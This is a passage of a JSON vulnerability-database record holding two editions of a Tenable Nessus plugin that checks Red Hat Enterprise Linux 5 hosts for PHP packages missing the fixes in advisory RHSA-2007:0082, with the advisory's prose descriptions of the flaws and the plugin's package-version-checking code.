"CVE-2007-0908"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated PHP packages that fix several security issues are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session extension; the str_replace() function; and the imap_mail_compose() function. If very long strings were passed to the str_replace() function, an integer overflow could occur in memory allocation. If a script used the imap_mail_compose() function to create a new MIME message based on an input body from an untrusted source, it could result in a heap overflow. An attacker with access to a PHP application affected by any these issues could trigger the flaws and possibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the zend_hash_init() function could be forced into an infinite loop, consuming CPU resources for a limited time, until the script timeout alarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted source, certain WDDX input packets could expose a random portion of heap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a database, and the database table contents were under an attacker's control, a format string vulnerability was possible which could allow arbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header() function in a script. However it is unlikely that this would have any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain super-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial of service attack by submitting an input variable with a deeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues.", "edition": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a6b6db60687d21edc1d3bd5f38267fe3385985a455634adf92ed744ebc4789bd", "hashmap": [{"hash": "141eb5e5e7f7efcaf70f35531014315a", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "350b87797b39b224a4879af085aa2c91", "key": "references"}, {"hash": "5ed89809cd59db22c6c4bc5e691596fe", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "ddc199dc1dacc50b088328ca4eddaf1b", "key": "published"}, {"hash": "c986b43752781caa839decc2a0741192", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4b44f6da67fcb87f1db557fc9f19e20c", "key": "href"}, {"hash": "ae60a3eadc9c5f27063fd4b65d989853", "key": "sourceData"}, {"hash": "235ef73aacd3c98bd8a26e36742ff4ae", "key": "cpe"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "2e53e2231fd68fdc02c53c3b32b818ad", "key": "description"}, {"hash": "342cc90fff603913e7fb1060eccdf48e", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25317", "id": "REDHAT-RHSA-2007-0082.NASL", "lastseen": "2018-11-17T06:49:43", "modified": "2018-11-16T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "25317", "published": "2007-05-25T00:00:00", "references": ["https://access.redhat.com/security/cve/cve-2007-1285", "https://access.redhat.com/security/cve/cve-2007-1701", "https://access.redhat.com/security/cve/cve-2007-0910", "https://access.redhat.com/errata/RHSA-2007:0082", "https://access.redhat.com/security/cve/cve-2007-0988", "https://access.redhat.com/security/cve/cve-2007-0909", "https://access.redhat.com/security/cve/cve-2007-1825", "https://access.redhat.com/security/cve/cve-2007-0906", "https://access.redhat.com/security/cve/cve-2007-0907", "https://access.redhat.com/security/cve/cve-2007-1380", "https://access.redhat.com/security/cve/cve-2007-0908"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0082. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25317);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2018/11/16 15:19:26\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1285\", \"CVE-2007-1380\", \"CVE-2007-1701\", \"CVE-2007-1825\");\n script_bugtraq_id(22496, 22764);\n script_xref(name:\"RHSA\", value:\"2007:0082\");\n\n script_name(english:\"RHEL 5 : php (RHSA-2007:0082)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension; the str_replace() function; and the imap_mail_compose()\nfunction. If very long strings were passed to the str_replace()\nfunction, an integer overflow could occur in memory allocation. If a\nscript used the imap_mail_compose() function to create a new MIME\nmessage based on an input body from an untrusted source, it could\nresult in a heap overflow. An attacker with access to a PHP\napplication affected by any these issues could trigger the flaws and\npossibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function could be forced into an infinite loop,\nconsuming CPU resources for a limited time, until the script timeout\nalarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted\nsource, certain WDDX input packets could expose a random portion of\nheap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a\ndatabase, and the database table contents were under an attacker's\ncontrol, a format string vulnerability was possible which could allow\narbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header()\nfunction in a script. However it is unlikely that this would have any\neffect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial\nof service attack by submitting an input variable with a\ndeeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1285\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1825\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0082\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0082\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n }\n}\n", "title": "RHEL 5 : php (RHSA-2007:0082)", "type": "nessus", "viewCount": 4}, "differentElements": ["modified", "sourceData"], "edition": 7, "lastseen": "2018-11-17T06:49:43"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:php-xml", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-soap", "p-cpe:/a:redhat:enterprise_linux:php-common", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-pdo", "p-cpe:/a:redhat:enterprise_linux:php-ncurses", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-cli", "p-cpe:/a:redhat:enterprise_linux:php-dba", "p-cpe:/a:redhat:enterprise_linux:php-bcmath", "p-cpe:/a:redhat:enterprise_linux:php-gd"], "cvelist": ["CVE-2007-1701", "CVE-2007-0907", "CVE-2007-1285", "CVE-2007-0909", "CVE-2007-1825", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1380", "CVE-2007-0906", "CVE-2007-0908"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated PHP packages that fix several security issues are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session extension; the str_replace() function; and the imap_mail_compose() function. If very long strings were passed to the str_replace() function, an integer overflow could occur in memory allocation. If a script used the imap_mail_compose() function to create a new MIME message based on an input body from an untrusted source, it could result in a heap overflow. An attacker with access to a PHP application affected by any these issues could trigger the flaws and possibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the zend_hash_init() function could be forced into an infinite loop, consuming CPU resources for a limited time, until the script timeout alarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted source, certain WDDX input packets could expose a random portion of heap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a database, and the database table contents were under an attacker's control, a format string vulnerability was possible which could allow arbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header() function in a script. However it is unlikely that this would have any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain super-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial of service attack by submitting an input variable with a deeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues.", "edition": 8, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "67a07b2c3fe6bdf48010729418415b97d7d9ebaab09f151bb1e38f14c67105f8", "hashmap": [{"hash": "141eb5e5e7f7efcaf70f35531014315a", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "350b87797b39b224a4879af085aa2c91", "key": "references"}, {"hash": "0e4da7304285381f16759537beaada44", "key": "modified"}, {"hash": "5ed89809cd59db22c6c4bc5e691596fe", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "ddc199dc1dacc50b088328ca4eddaf1b", "key": "published"}, {"hash": "c986b43752781caa839decc2a0741192", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4b44f6da67fcb87f1db557fc9f19e20c", "key": "href"}, {"hash": "235ef73aacd3c98bd8a26e36742ff4ae", "key": "cpe"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "2e53e2231fd68fdc02c53c3b32b818ad", "key": "description"}, {"hash": "16ae60f65e15ed9cdc48cbd74258f565", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25317", "id": "REDHAT-RHSA-2007-0082.NASL", "lastseen": "2019-01-03T10:04:55", "modified": "2019-01-02T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "25317", "published": "2007-05-25T00:00:00", "references": ["https://access.redhat.com/security/cve/cve-2007-1285", "https://access.redhat.com/security/cve/cve-2007-1701", "https://access.redhat.com/security/cve/cve-2007-0910", "https://access.redhat.com/errata/RHSA-2007:0082", "https://access.redhat.com/security/cve/cve-2007-0988", "https://access.redhat.com/security/cve/cve-2007-0909", "https://access.redhat.com/security/cve/cve-2007-1825", "https://access.redhat.com/security/cve/cve-2007-0906", "https://access.redhat.com/security/cve/cve-2007-0907", "https://access.redhat.com/security/cve/cve-2007-1380", "https://access.redhat.com/security/cve/cve-2007-0908"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0082. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25317);\n script_version (\"1.21\");\n script_cvs_date(\"Date: 2019/01/02 16:37:55\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1285\", \"CVE-2007-1380\", \"CVE-2007-1701\", \"CVE-2007-1825\");\n script_bugtraq_id(22496, 22764);\n script_xref(name:\"RHSA\", value:\"2007:0082\");\n\n script_name(english:\"RHEL 5 : php (RHSA-2007:0082)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension; the str_replace() function; and the imap_mail_compose()\nfunction. If very long strings were passed to the str_replace()\nfunction, an integer overflow could occur in memory allocation. If a\nscript used the imap_mail_compose() function to create a new MIME\nmessage based on an input body from an untrusted source, it could\nresult in a heap overflow. An attacker with access to a PHP\napplication affected by any these issues could trigger the flaws and\npossibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function could be forced into an infinite loop,\nconsuming CPU resources for a limited time, until the script timeout\nalarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted\nsource, certain WDDX input packets could expose a random portion of\nheap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a\ndatabase, and the database table contents were under an attacker's\ncontrol, a format string vulnerability was possible which could allow\narbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header()\nfunction in a script. However it is unlikely that this would have any\neffect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial\nof service attack by submitting an input variable with a\ndeeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1285\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1825\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0082\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", 